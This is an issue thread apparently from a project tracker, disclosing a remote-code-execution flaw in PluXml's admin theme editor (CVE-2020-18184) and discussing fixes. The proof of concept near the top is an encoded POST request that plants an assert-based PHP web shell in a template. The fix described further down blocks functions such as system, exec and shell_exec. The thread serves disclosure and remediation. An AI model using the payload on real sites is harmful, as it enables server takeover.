PluXml
PluXml copied to clipboard
pluxml
An issue in the theme edit function
The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.
Poc:
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A
then visit /PluXml/themes/defaut/tags.php?c=phpinfo();
Hello, I confirm this vulnerability. What's your recommandation ? Using an XSS filter ? Thanks for help.
You can disable the assert evaluation in php.ini. I have Ubuntu Bionic 18.04.2 and your code does not work. Display phpinfo and look for assert. I have "zend.assertions" equals -1 for local and global values.
assert_options(ASSERT_ACTIVE,false);
dans le début du fichier index.php ?
In fact, I think it’s not a good idea for webadmin to be able to edit .php file directly. Filtering is never enough If you really need this feature. Ignore this problem or verify that webadmin is a system administrator.
Hello, it appears CVE-2020-18184 has been assigned to this issue. However, the documentation seems to include a lot of instructions for how to execute arbitrary code in themes:
Le moteur de plugin de PluXml repose sur un système de hooks (« crochets » en français) permettant d’injecter du code php, html, javascript dans celui de PluXml.
https://wiki.pluxml.org/developper/developpement/
The examples even make extensive use of eval, which suggests to me that the feature is intended to allow administrators to execute anything they want any time they want.
Is this working as intended?
Thanks
A new function plxUtils::sanitizePhp is added to PluXml The value for content field is checked with this function. It comments critical functions in PHP script like : fsockopen, proc_open, system, exec, chroot, shell_exec,socket See PR#589
Of course, it's better to disable these critical function in php.ini.